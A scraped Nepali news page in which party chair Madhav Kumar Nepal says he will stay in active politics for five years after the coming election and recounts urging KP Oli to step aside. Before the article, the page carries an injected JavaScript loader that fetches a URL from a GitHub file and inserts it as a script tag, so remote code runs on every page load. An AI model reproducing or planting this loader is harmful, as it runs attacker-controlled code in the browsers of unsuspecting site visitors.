;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ‘आगामी चुनावपछि ५ वर्ष सक्रिय राजनीतिमा रहन्छु ।’-माधवकुमार नेपाल – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ‘आगामी चुनावपछि ५ वर्ष सक्रिय राजनीतिमा रहन्छु ।’-माधवकुमार नेपाल
Breaking News

‘आगामी चुनावपछि ५ वर्ष सक्रिय राजनीतिमा रहन्छु ।’-माधवकुमार नेपाल

जुनेली न्यूज, काठमाण्डौ | नेकपा एकीकृत समाजवादीका अध्यक्ष माधवकुमार नेपालले आगामी चुनावपछि ५ वर्ष सक्रिय राजनीति गर्ने बताएका छन् ।

२००९ फागुनमा जन्मिएका नेपालले भर्खरै नेकपा एमाले विभाजन गरेर नेकपा एकीकृत समाजवादी पार्टी बनाएका छन् । निर्वाचन आयोगले नयाँ दललाई मान्यता दिएपछि बिहीबार आयोजित पहिलो पत्रकार सम्मेलनमा अध्यक्ष नेपालले बुढो हुँदासम्म पदमा बसिरहने आफ्नो चाहना नभएको बताए ।आजीवन राजनीति नगर्ने भन्दै उनले अघि भने, ‘मेरो मोटो कुरा के छ आगामी चुनावपछि ५ वर्ष सक्रिय राजनीतिमा रहन्छु ।’ यद्यपि पार्टीका नेताहरुले अहिले नै त्यसो नभन्नुस् है भनेको उनले सुनाए ।

नेकपा एमालेमा रहँदा पनि केपी ओलीलाई विदा गरेर युवा पुस्तालाई नेतृत्व लिन आग्रह गरेको अध्यक्ष नेपालले बताए । ‘मैले त अहिले नै भनेको थिए, केपी ओलीलाई विदा गरेर युवा पुस्ताले सम्हालोस् । सम्हाले भइो, मेरो सहयोग रहन्छ’ उनले भने ।

फेसबुक प्रतिक्रियाहरु